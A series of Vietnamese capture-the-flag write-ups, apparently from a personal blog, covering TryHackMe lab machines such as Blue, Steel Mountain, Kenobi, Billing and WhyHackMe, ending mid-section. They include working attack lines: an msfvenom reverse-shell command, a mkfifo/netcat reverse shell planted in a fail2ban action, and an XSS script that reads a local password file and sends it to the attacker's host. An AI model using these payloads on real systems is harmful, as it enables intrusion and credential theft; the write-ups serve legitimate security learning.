Mọi thứ đã chuẩn bị xong, mình quay trở lại session netcat lúc nãy và chạy file rv-shell.exe (Start-Process rv-shell.exe) mà server đã tải về.

Khi file này được thực thi, một reverse shell đã kết nối thành công và được nâng cấp lên meterpreter shell.

Leo thang đặc Quyền

Bây giờ, mình sẽ dùng kỹ thuật mạo danh token để chiếm quyền SYSTEM.

Windows sử dụng các token để đảm bảo các tài khoản có đúng quyền để thực hiện các hành động cụ thể. Token thường được gán cho tài khoản khi người dùng đăng nhập hoặc được xác thực. Điều này thường được thực hiện bởi lsass.exe.

Access token này bao gồm:

User SIDs (Security Identifier).
Group SIDs
Đặc quyền

Đọc thêm tại đây

Có 2 loại access token:

Primary access tokens: được liên kết với tài khoản người dùng và được tạo khi đăng nhập.
Impersonation tokens: cho phép một tiến trình cụ thể (hoặc luồng trong tiến trình) có quyền truy cập vào các tài nguyên bằng cách sử dụng token của người dùng khác.

Đối với impersonation token, có nhiều cấp độ khác nhau:

SecurityAnonymous: người dùng hiện tại không thể mạo danh người dùng khác.
SecurityIdentification: người dùng hiện tại có thể lấy danh tính và đặc quyền của người dùng khác nhưng không thể mạo danh.
SecurityImpersonation: người dùng có thể mạo danh bối cảnh bảo mật trên hệ thống cục bộ (local system).
SecurityDelegation: người dùng có thể mạo danh bối cảnh bảo mật trên hệ thống từ xa (remote system).

Các đặc quyền của một tài khoản (được cấp cho tài khoản khi được tạo hoặc kế thừa từ một nhóm) cho phép người dùng thực hiện các hành động cụ thể. Một số đặc quyền bị làm dụng phổ biến nhất:

SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege

Đọc thêm tại đây

Sử dụng lệnh whoami /priv mình nhận được một số đặc quyền đang được cho phép như:

SeDebugPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeCreateGlobalPrivilege

Sử dụng module incognito để khai thác lỗ hổng này.

Mình liệt kê các tokens hiện có thì phát hiện token BUILTIN\Administrators.

Sau đó mình thực hiện mạo danh token này và chiếm được quyền SYSTEM.

Flag sẽ nằm tại c:\Windows\System32\config\

Điều này là do cách Windows xử lý các quyền - nó sử dụng Primary Token của tiến trình và không phải là Impersonation token để có thể xác định tiến trình có thể hoặc không thể làm gì.

Phải đảm bảo đang migrate vào tiến trình với quyền tương ứng.

Biblioteca

Wed, 10 Sep 2025 00:00:00 GMT

Thu thập thông tin

Nmap scan

Thực hiện scan port, mình phát hiện port SSH và HTTP.

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) # [!code highlight:1]
| ssh-hostkey: 
|   3072 3a:a5:a9:5d:99:42:02:dd:dc:7e:7e:5b:d8:1c:02:e2 (RSA)
|   256 dc:6a:a1:d9:92:8c:82:ac:a8:48:f1:08:ca:77:29:96 (ECDSA)
|_  256 a4:1d:94:f6:a2:b6:fb:da:10:e9:69:db:c5:31:8a:26 (ED25519)
8000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10) # [!code highlight:1]
|_http-title:  Login 
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Truy cập vào port 8000 mình được chuyển đến trang login.

Kiểm tra SQL Injection

Khi mình chèn một ký tự đặc biệt vào trường username thì website trả về lỗi.

Mình thử với một payload SQL Injection.

Kết quả là mình vào được index page với tên người dùng smokey.

Flag 1

SQL Map

Xác định được đây là lỗ hổng SQL Injection, mình sử dụng công cụ SQL Map để trích xuất dữ liệu thì nhận được dữ liệu từ bảng users với 3 cột email, username, password.

Truy cập người dùng smokey

Sử dụng thông tin này để kết nối SSH thì mình đã truy cập được vào người dùng smokey.

Và mình tìm được flag tại thư mục home của người dùng hazel.

Tới đây mình...BÍ!

Truy cập người dùng hazel và flag

Xem hint của thử thách thì mình nhận được 2 chữ Weak password

...

Sau một khoảng thời gian nho nhỏ, mình xác định được thông tin đăng nhập của người dùng hazel và password là hazel.

SSH vào người dùng này và mình nhận được flag.

Flag 2

Sudo Misconfiguration (Python)

Mình sử dụng lệnh sudo -l xem mình có thể dùng sudo cho những gì, thì tại đây mình được dùng sudo cho python3 và file hasher.py.

Vấn đề nằm ở chỗ là mình không có quyền ghi vào file hasher.py.

Nhưng khi mở file lên, mình nhận ra mình có thể sử dụng PYTHONPATH và giả mạo hashlib này.

Mình tạo một file hashlib.py với mục đích mở một shell mới và đặt nó tại thư mục /tmp.

Truy cập người dùng root và flag

Sau đó thực thi file hasher.py với quyền sudo kèm theo PYTHONPATH=/tmp, khi file được thực thi python sẽ dựa vào PYTHONPATH để tìm kiếm thư viện và trỏ tới thư mục /tmp và thực thi file hashlib.py giả mạo mình tạo ra nhằm mở một shell mới dưới quyền sudo (root).

Cuối cùng, mình tìm thấy flag tại thư mục root.

Steel Mountain

Wed, 10 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Link lab

Truy cập ban đầu

Khi truy cập mục tiêu, giao diện trang web chứa hình ảnh của Employee of the month.

Mở Page Source, theo tên ảnh thì người này tên Bill Harper

Tiếp theo, mình thực hiện scan các port của mục tiêu này và phát hiện thêm một port chạy HttpFileServer httpd 2.3 (8080)

PORT      STATE SERVICE            VERSION
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3

Tìm kiếm một chút thì HFS còn được gọi là Rejetto HTTP File Server, đây là một ứng dụng mã nguồn mở biến máy tính trở thành một File Server dựa trên web để chia sẻ file mà không cần một kết nối mạng lâu dài hoặc cài đặt thêm phần mềm nào trên thiết bị nhận.

Và ở phiên bản Rejetto 2.3 này tồn tại một lỗ hổng được báo cáo trong CVE-2014-6287 dẫn tới kiểm soát quyền truy cập.

Sử dụng công cụ Metasploit có module exploit/windows/http/rejetto_hfs_exec hỗ trợ khai thác lỗ hổng này.

Các thông số của module này như sau:

Sau khi khai thác thành công, mình chiếm được quyền truy cập vào người dùng bill.

Flag sẽ được đặt tại thư mục Desktop của người dùng này.

Leo thang đặc quyền

Để thu thập thông tin về máy này, mình upload một powershell script có tên là PowerUp, đây là file với mục đích đánh giá máy Windows và xác định xem có điều gì bất thường hay không.

Khi thực thi script có service tên AdvancedSystemCareService9 là Unquoted Service Paths, có nghĩa là đường dẫn có khoảng trắng nhưng không có dấu ngoặc kép.

Tại thư mục C:\ người dùng bình thường có quyền ghi file và CanRestart được đặt thành true có nghĩa là có thể khởi động lại ứng dụng này thay vì phải khởi động lại máy.

Từ thông tin thu thập được, mình có thể đổi ứng dụng đã được cấu hình thành ứng dụng độc hại của mình để có thể leo thang đặc quyền lên SYSTEM.

Ở đây là C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe.

Thì Windows sẽ thực hiện thêm .exe vào các khoảng trắng và thực thi nó theo từng phần:

C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\IObit\Advanced.exe

Và cuối cùng là C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

Khi này mình tạo một file độc hại tên Advanced.exe đặt trong thư mục C:\Program Files (x86)\IObit\ để khi Windows đến bước 3 sẽ tiến hành thực thi file này.

Trong công cụ đi kèm của Metasploit - msfvenom mình sẽ tạo một ứng dụng tên Advanced.exe mở một reverse shell về máy mình.

msfvenom -p windows/shell_reverse_tcp LHOST=10.17.67.204 LPORT=7304 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

Sau đó, mình chuyển file này vào thư mục C:\Program Files (x86)\IObit.

Mở một session khác cho msfconsole sử dụng module exploit/multi/handler với payload windows/shell_reverse_tcp để tạo 1 listener lắng nghe khi máy bị tấn công kết nối vào.

Cuối cùng mình khởi động lại dịch vụ AdvancedSystemCareService9, khi đó máy này sẽ chạy ứng dụng độc hại mà mình đã tạo, kết nối tới listener và mình đã leo thang đặc quyền lên SYSTEM.

Có được quyền SYSTEM đồng nghĩa mình có toàn quyền trong hệ thống này và mình tìm thấy flag của root tại thư mục Desktop của Administrator.

Truy cập và leo thang đặc quyền không dùng Metasploit

Thay vì sử dụng công cụ Metasploit để khai thác tự động, có thể khai thác bằng cách khác.

Tại đây mình sử dụng file python khai thác trên ExploitDB.

Một số yêu cầu của file để nó có thể khai thác thành công như sau:

Host 1 web server bên trong có file nc.exe.
Sẽ phải chạy file nhiều lần và lần đầu là để chuyển nc.exe sang máy bị tấn công.

Như vậy, mình đã mở một Simple HTTP Server bằng python3 và khi thực thi file nó đã tải nc.exe từ máy mình sang máy có lỗ hổng.

Đồng thời mình cũng sẽ mở một netcat listener ở port 7304 để khi khai thác thành công nó sẽ kết nối vào đây.

Mình đã có quyền truy cập vào Bill như cũ.

Tiếp theo, để thực hiện leo thang đặc quyền lên SYSTEM mình thực hiện thu thập thông tin bằng công cụ winPEAS.

Công cụ này đã phát hiện lỗ hổng tại service AdvancedSystemCareService9 cho phép WriteData/CreateFiles.

Từ đây các bước thực hiện như cũ, sử dụng công cụ msfvenom để tạo phần mềm độc hại kết nối tới listener.

Listener mình sẽ sử dụng netcat với các tùy chọn -lvnp thay vì dùng module của Metasploit như trước và mình đã leo thang đặc quyền lên SYSTEM.

Blue

Tue, 09 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Link lab

Thu thập thông tin

Đầu tiên, mình cần thu thập thông tin về mục tiêu có IP 10.201.76.18.

Sử dụng công cụ nmap với cú pháp như sau:

nmap -n -Pn -p-1000 10.201.76.18

# -n        Không phân giải tên miền => Giảm thời gian scan
# -Pn       Bỏ qua host discovery (ping) => Scan port trực tiếp
# -p-1000   Scan từ port 1-1000

Mình thu được kết quả 3 port đang mở.

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Sử dụng thêm tùy chọn -sV để xem thông tin phiên bản.

PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) # [!code highlight:1]
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Port SMB (445), sử dụng phiên bản Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP).

Tìm trên ExploitDB, đây là phiên bản có một lỗ hổng khá nổi còn có tên là MS17-010 EternalBlue cho phép thực thi lệnh từ xa và khai thác thông qua cổng của dịch vụ SMB.

Chiếm quyền truy cập

Sau khi có thông tin về lỗ hổng, mình sử dụng công cụ Metasploit thực hiện khai thác và chiếm quyền truy cập.

Tại đây mình sử dụng module 0 (exploit/windows/smb/ms17_010_eternalblue).

Mình đặt các tùy chọn RHOSTS (IP mục tiêu), LHOST (IP máy tấn công) và theo mặc định payload sẽ dùng module windows/x64/meterpreter/reverse_tcp:

Sau quá trình công cụ tự động khai thác, kết quả trả về cho thấy đã chiếm quyền truy cập thành công và đã được nâng cấp lên meterpreter shell.

Giả sử nếu không sử dụng payload meterpreter từ đầu thì để thực hiện nâng cấp shell thông thường lên meterpreter có thể sử dụng module post/multi/manage/shell_to_meterpreter .

Vì chạy trong RAM nên nó sẽ khó bị phát hiện hơn so với việc truy cập và tương tác trên shell thông thường.

Kết quả của lệnh getuid cũng cho thấy mình đang thực thi với quyền SYSTEM (Quyền cao nhất của Windows).

Tiếp theo, mình dùng lệnh ps để xem các tiến trình đang chạy thì trong đó tiến trình có PID 700 đang chạy dịch vụ lsass.exe (Local Security Authority Subsystem Service - dịch vụ này có nhiệm vụ xác thực người dùng đăng nhập vào máy, xử lý thay đổi mật khẩu và tạo access token).

Mình thực hiện migrate vào tiến trình này để chuẩn bị cho bước tiếp theo.

Cracking

Sau khi migrate vào tiến trình có PID 700, mình thực thi hashdump để lấy danh sách người dùng kèm theo hash mật khẩu của họ.

Đối với người dùng Administrator và Guest có hash 31d6cfeOd16ae931b73c59d7eOc089cO đồng nghĩa các người dùng này có mật khẩu rỗng.

Người dùng Jon có hash mật khẩu là ffb43f0de35be4d9917ac0cc8ad57f8d.

Sử dụng công cụ giải hash, mình nhận được mật khẩu của Jon là alqfna22

Tìm flags!

Đây là nhiệm vụ cuối của lab này là tìm 3 flag với 3 câu hỏi.

Flag1? This flag can be found at the system root.

System root có nghĩa là vị trí cấp đầu tiên của cây thư mục, vì đây là Windows nên root sẽ là ổ C.

Flag2? This flag can be found at the location where passwords are stored within Windows.

Vị trí các mật khẩu được lưu trên Windows tại C:/Windows/System32/config.

Theo Wikipedia thì các file registry sau được lưu tại đây:

Sam (HKEY_LOCAL_MACHINE\SAM)
Security (HKEY_LOCAL_MACHINE\SECURITY)
Software (HKEY_LOCAL_MACHINE\SOFTWARE)
System (HKEY_LOCAL_MACHINE\SYSTEM)
Default (HKEY_USERS.DEFAULT)

Flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Thật ra thì...nhìn vào tên của 2 file flag mình vừa tìm được thì cũng đoán được flag 3 có tên gì rồi :v

Vì đang thực hiện với quyền SYSTEM nên mình có toàn quyền đối với hệ thống này, kể cả flag 1 và 2 cũng có thể làm cách này nhưng vì lý do học tập thì 2 cách trên là cách làm hợp lý hơn.

Kenobi

Mon, 08 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Link lab

Thu thập thông tin Samba

Samba được biết với sự linh hoạt về việc truy cập file giữa các hệ điều hành và còn được gọi là file system. Nó cho phép người dùng cuối truy cập, sử dụng các file và các tài nguyên chung được sử dụng trong mạng nội bộ hoặc internet.

Samba được xây dựng trên giao thức client/server của SMB - Server Message Block. Nó chỉ được phát triển dành cho Windows, nếu không có Samba thì các nền tảng máy tính khác sẽ không thể truy cập dù cùng một mạng.

Đầu tiên, mình cần thu thập thông tin về mục tiêu có IP 10.10.78.65.

Mình tìm được 7 cổng đang mở, trong đó có SMB.

PORT     STATE SERVICE
21/tcp   open  ftp # [!code highlight:1]
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind # [!code highlight:1]
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds # [!code highlight:1]
2049/tcp open  nfs

Sau đó, mình sửa dụng lệnh smbclient -L để thực hiện hiển thị các thư mục được share thì tìm được thư mục anonymous.

Kết nối vào thư mục anonymous và tìm thấy file log.txt.

Bên trong file log này chứa một số thông tin như:

SSH key được tạo ra cho người dùng Kenobi
ProFTPD server.

Trước đó trong kết quả scan, mình có scan ra port 111 chạy dịch vụ rpcbind.

Trong trường hợp này, port 111 truy cập vào file system.

Sử dụng lệnh nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.168.6 mình tìm được thư mục var.

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Chiếm quyền truy cập ban đầu với ProFtpd

ProFTPD là một FTP server mã nguồn mở và miễn phí, tương thích với hệ thống Unix và Windows. Trong quá khứ nó cũng có một số phiên bản tồn tại lỗ hổng.

Mình dùng lệnh nmap -p 21 -n -Pn -sV 10.10.168.6 để xem thông tin phiên bản của ProFTPD thì đây là phiên bản 1.3.5.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5

Tìm trên ExploitDB, phiên bản này tồn tại một lỗ hổng dẫn tới kiểm soát quyền truy cập.

PoC sử dụng **CPFR (Copy from) **và **CPTO (Copy to) để **thao tác copy paste một file từ chỗ này sang khác bên trong FTP server.

Từ các thông tin thu thập được:

File log.txt => biết được SSH key của người dùng Kenobi nằm tại /home/kenobi/.ssh/id_rsa.
Thư mục /var mình có thể truy cập từ mạng.

Quy trình tấn công có thể hình dung như sau:

Dùng CPFR, CPTO copy key SSH của Kenobi vào thư mục /var.
Mount thư mục /var để có thể lấy SSH key về.
Có SSH key thì SSH vào Kenobi => lấy quyền truy cập thành công.

Đầu tiên, mình thực hiện kết nối và copy file ra /var:

Tiếp theo, mount thư mục /var.

Cuối cùng, copy SSH key ra máy tấn công và thực hiện SSH vào Kenobi.

Khi SSH thành công, flag sẽ nằm tại thư mục home của Kenobi.

Leo thang đặc quyền với biến môi trường

SUID Bit rất nguy hiểm, nếu một file nhị phân tồn tại SUID Bit nó sẽ có khả năng chạy với đặc quyền cao hơn.

Tại người dùng Kenobi, mình tìm các file có SUID Bit bằng cách thực thi lệnh:

find / -perm -u=s -type f 2>/dev/null

Và tại đây mình thấy một file nhị phân có thể sử dụng để leo thang đặc quyền.

Thực thi file này thử, thì mình xác định được đây là một file do Kenobi tạo ra.

Mình dùng lệnh strings để trích xuất các chuỗi bên trong file nhị phân này thì có 3 lệnh ứng với 3 option.

Mình nhận ra các lệnh này được chạy mà không bao gồm đường dẫn, khi gọi lệnh thì máy sẽ thực thi thông qua biến môi trường.

Từ đó, mình tạo một file thực thi giả curl, bên trong thực thi gọi một shell /bin/sh và cấp quyền cho file này (Đọc - Ghi - Thực thi).

Vì mình tạo file này tại thư mục /tmp nên mình xuất biến môi trường tại đây.

Khi thực thi file /usr/bin/menu và với tùy chọn 1, máy này sẽ thực thi curl nhưng sẽ là curl giả và thực thi /bin/sh với quyền root.

Sau khi chiếm được quyền truy cập vào root, flag sẽ nằm tại thư mục /root.

Billing

Thu, 04 Sep 2025 00:00:00 GMT

import { Aside } from 'astro-pure/user'

Link thử thách

Thu thập thông tin

Nmap scan

Mình thực hiện scan các cổng thì thấy một số cổng đang mở như:

Dịch vụ SSH.
HTTP đang chạy trên Apache 2.4.62
Asterisk Call Manager - theo mình tìm hiểu được thì đây là API realtime của Asterisk cho phép developer xây dựng các ứng dụng xoay quanh hệ thống VoIP/Tổng đài.

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0) # [!code highlight:1]
| ssh-hostkey: 
|   256 fb:7c:b8:0d:50:f4:93:61:6b:ce:21:65:19:33:66:ba (ECDSA)
|_  256 f1:e3:57:25:0b:8a:3a:20:40:82:04:a0:f7:40:bf:c2 (ED25519)
80/tcp   open  http     Apache httpd 2.4.62 ((Debian)) # [!code highlight:1]
|_http-server-header: Apache/2.4.62 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/mbilling/
| http-title:             MagnusBilling        
|_Requested resource was http://10.201.16.39/mbilling/
5038/tcp open  asterisk Asterisk Call Manager 2.10.6 # [!code highlight:1]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Dịch vụ HTTP

Khi truy cập vào website, mình được chuyển hướng tới /mbilling.

Mình tìm hiểu được rằng đây là một ứng dụng web mã nguồn mở MagnusBilling.

Và mình tìm thấy được file README.md có thông tin rằng họ đang ở phiên bản 7.x.x.

Tìm kiếm một tí thì phiên bản này có một lỗ hổng có CVE là 2023-30258 cho phép thực thi lệnh.

Flag 1

Lỗ hổng Command Injection

Khi thực thi như PoC thì không có kết quả nào trả về.

Để chắc chắn lệnh có thể thực thi, mình sử dụng kỹ thuật time delay, nếu lệnh thực thi được thì nó sẽ phải mất một khoảng thời gian để phản hồi.

Và đúng như dự định với lệnh ping -c 5 đến localhost thì mất khoảng gần 5 giây để hoàn thành, chứng minh lệnh đã thực thi.

Truy cập người dùng asterisk và flag

Mình thực hiện mở một reverse shell và vào được tài khoản asterisk.

Sau đó, mình sử dụng kỹ thuật Stabilizing để có thể tương tác shell linh hoạt hơn.

┌──(CloseUrEyes㉿CtrlZet)-[~/workspace/tryhackme/challenges/billing]
└─$ nc -lvnp 7304                                       
listening on [any] 7304 ...
connect to [10.17.67.204] from (UNKNOWN) [10.201.16.39] 59284
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'  # [!code highlight:1]
asterisk@ip-10-201-16-39:/var/www/html/mbilling/lib/icepay$ export TERM=xterm  # [!code highlight:1]
export TERM=xterm
asterisk@ip-10-201-16-39:/var/www/html/mbilling/lib/icepay$ ^Z  # [!code highlight:1]
zsh: suspended  nc -lvnp 7304
                                                                                                                                                             
┌──(CloseUrEyes㉿CtrlZet)-[~/workspace/tryhackme/challenges/billing]
└─$ stty raw -echo; fg  # [!code highlight:1]
[1]  + continued  nc -lvnp 7304

asterisk@ip-10-201-16-39:/var/www/html/mbilling/lib/icepay$

Tại home của asterisk có file user.txt chứa flag.

Flag 2

fail2ban-client

Kiểm tra qua thì mình thấy người dùng này có thể sử dụng fail2ban-client với quyền sudo.

asterisk@ip-10-201-18-163:/home/magnus$ sudo -l
Matching Defaults entries for asterisk on ip-10-201-18-163:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on ip-10-201-18-163:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client

Fail2Ban là một phần mềm phòng ngừa xâm nhập. Được xây dựng bằng ngôn ngữ Python, nó được thiết kế để ngăn chặn các cuộc tấn công brute-force. Nó chạy trên các hệ thống POSIX có giao diện với hệ thống kiểm soát gói tin hoặc tường lửa được cài đặt cục bộ, như iptable hoặc TCP Wrapper.

Và fail2ban-client là ứng dụng cho phép tương tác, cấu hình và điều khiển fail2ban-server.

Thường thì ứng dụng này sẽ hoạt động với quyền root, điều đó dẫn tới việc leo thang đặc quyền lên root nếu cấu hình chưa tốt.

ps -aux | grep fail2ban
root         852  0.1  1.5 1171732 31244 ?       Ssl  20:12   0:05 /usr/bin/python3 /usr/bin/fail2ban-server -xf start  # [!code highlight:1]

Ứng dụng này hoạt động dựa trên các Jail, giải thích đơn giản thì đây là các cấu hình mà khi các hệ thống giám sát log phát hiện điều gì trùng khớp với cấu hình này sẽ thực hiện hành động như được thiết đặt.

Mình kiểm tra các Jail thì mình thấy có 8 Jail này, chọn cái nào cũng được miễn là nó active.

asterisk@ip-10-201-18-163:/home/magnus$ sudo fail2ban-client status
Status
|- Number of jail:      8
`- Jail list:   ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd

Tại đây mình chọn sshd và tạo một action mới tên exploit.

sudo fail2ban-client set sshd action exploit

Tại action này mình cho nó thực hiện mở kết nối reverse shell, nghĩa là mỗi khi ban một IP nó sẽ thực hiện hành động mà mình đã đặt là

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.67.204 7305 >/tmp/f;.

sudo fail2ban-client set sshd action exploit actionban "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.67.204 7305 >/tmp/f;"

Truy cập người dùng root và flag

Khi thực hiện ban IP bất kỳ, nó sẽ bắt đầu thực hiện reverse shell.

asterisk@ip-10-201-18-163:/home/magnus$ sudo fail2ban-client set sshd banip 127.0.0.1
1

Khi kết nối reverse shell thực hiện thành công, mình đã leo thang đặc quyền lên được root và tìm được flag trong file root.txt tại thư mục /root.

WhyHackMe

Thu, 04 Sep 2025 00:00:00 GMT

Link thử thách

Thu nhập thông tin

Nmap scan

Đầu tiên, mình thực hiện scan các port thì thấy một số thông tin quan trọng như:

Port FTP mở và cho phép đăng nhập với tư cách khách, bên trong có một file update.txt.
Port SSH sẽ khả dụng sau này.
Port HTTP và đang phục vụ bằng Apache 2.4.41.
Và một port khá đáng ngờ nhưng không thể truy cập.

PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3 # [!code highlight:1]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.17.67.204
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230) # [!code highlight:3]
|_-rw-r--r--    1 0        0             318 Mar 14  2023 update.txt
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 47:71:2b:90:7d:89:b8:e9:b4:6a:76:c1:50:49:43:cf (RSA)
|   256 cb:29:97:dc:fd:85:d9:ea:f8:84:98:0b:66:10:5e:6f (ECDSA)
|_  256 12:3f:38:92:a7:ba:7f:da:a7:18:4f:0d:ff:56:c1:1f (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Welcome!!
41312/tcp filtered unknown # [!code highlight:1]
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Dịch vụ FTP

Truy cập vào dịch vụ FTP và thực hiện lấy file update.txt.

ftp 10.201.82.126
Connected to 10.201.82.126.
220 (vsFTPd 3.0.3)
Name (10.201.82.126:CloseUrEyes): anonymous # [!code highlight:1]
331 Please specify the password.
Password:  # [!code highlight:1]
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||36920|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             318 Mar 14  2023 update.txt # [!code highlight:1]
226 Directory send OK.
ftp> get update.txt # [!code highlight:2]
local: update.txt remote: update.txt
229 Entering Extended Passive Mode (|||49563|)
150 Opening BINARY mode data connection for update.txt (318 bytes).
100% |****************************************************************************************************************|   318        2.69 KiB/s    00:00 ETA
226 Transfer complete.
318 bytes received in 00:00 (0.73 KiB/s)

Hey I just removed the old user mike because that account was compromised
and for any of you who wants the creds of new account visit 127.0.0.1/dir/pass.txt
and don't worry this file is only accessible by localhost(127.0.0.1), so nobody 
else can view it except me or people with access to the common account. 
- admin

Nội dung chính của file update.txt nói rằng chỉ localhost mới có thể truy cập vào /dir/pass.txt.

Website

Truy cập vào website, giao diện của nó như sau:

Mình sử dụng công cụ gobuster để scan các enpoint, từ nội dung trên mình cũng xác định được website này sử dụng PHP.

gobuster dir -u http://10.201.82.126/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -x php

/.php                 (Status: 403) [Size: 278]
/index.php            (Status: 200) [Size: 563]
/blog.php             (Status: 200) [Size: 3102]
/login.php            (Status: 200) [Size: 523]
/register.php         (Status: 200) [Size: 643]
/dir                  (Status: 403) [Size: 278]
/assets               (Status: 301) [Size: 315] [--> http://10.201.82.126/assets/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 278]

Flag 1

Lỗ hổng XSS

Phát hiện trang đăng ký tài khoản, mình thực hiện đăng ký tài khoản để xem có gì đặc biệt không.

Đăng ký tài khoản xong thì mình thấy trong trang blog có phần comment.

Nghĩ ngay đến XSS, nhưng mình thử thì không thành công.

Sau một khoảng thời gian, mình khai thác thành công XSS (Gợi ý tí là nó không nằm trong nội dung comment).

Dựa vào thông điệp lúc nãy, mình viết một script nhỏ với mục đích khi server thực thi file này, nó sẽ đọc file /dir/pass.txt sau đó gửi nội dung về lại cho mình ở dạng base64.

fetch("http://127.0.0.1/dir/pass.txt")
  .then(r => r.text())
  .then(data => {
    fetch("http://10.17.67.204:8080/?data=" + btoa(data));
  });

Payload mình chèn vào như sau:

<script src="http://10.17.67.204:8080/xss-exploit.js"></script>

Mình mở python http và reload lại website để server thực thi và request về bên mình kèm theo base64 đã mã hóa.

Truy cập người dùng jack và flag

Giải mã base64 thì mình nhận được thông tin đăng nhập của người dùng jack.

Tại home của jack có file user.txt chứa flag.

Flag 2

Mình kiểm tra những thứ mà người dùng này có thể dùng với sudo.

jack@ubuntu:~$ sudo -l
Matching Defaults entries for jack on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jack may run the following commands on ubuntu:
    (ALL : ALL) /usr/sbin/iptables # [!code highlight:1]

Tại đây người dùng này có thể dùng sudo đối với iptables.

Kiểm tra sơ qua thì mình thấy ngay vấn đề ban đầu thắc mắc, các gói tin đi qua port 41312 đều bị DROP.

jack@ubuntu:~$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       tcp  --  anywhere             anywhere             tcp dpt:41312  # [!code highlight:1]
ACCEPT     all  --  anywhere             anywhere            
ACCEPT     all  --  anywhere             anywhere             ctstate NEW,RELATED,ESTABLISHED
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:ssh
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:http
ACCEPT     icmp --  anywhere             anywhere             icmp echo-request
ACCEPT     icmp --  anywhere             anywhere             icmp echo-reply
DROP       all  --  anywhere             anywhere            

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  anywhere             anywhere

Mình chuyển trạng thái lại từ DROP thành ACCEPT.

File urgent.txt

Khi đi dạo thì mình thấy trong thư mục opt có 2 file như sau:

File urgent.txt nói rằng họ bị hack và có một số file bên trong /usr/bin/cgi-bin vàhọ không thể xóa nó dù ở quyền root.

Khả năng đó là payload của kẻ tấn công và mình có thể tận dụng nó.

File capture.pcap

Mình sử dụng công cụ Wireshark phân tích file capture.pcap thì không nhận được thông tin gì vì các gói tin đã được mã hóa do dùng TLS.

Tìm trong cấu hình Apache mình biết được key giải mã apache.key ở /etc/apache2/certs/.

<VirtualHost *:41312>
        ServerName www.example.com
        ServerAdmin webmaster@localhost
        #ErrorLog ${APACHE_LOG_DIR}/error.log
        #CustomLog ${APACHE_LOG_DIR}/access.log combined
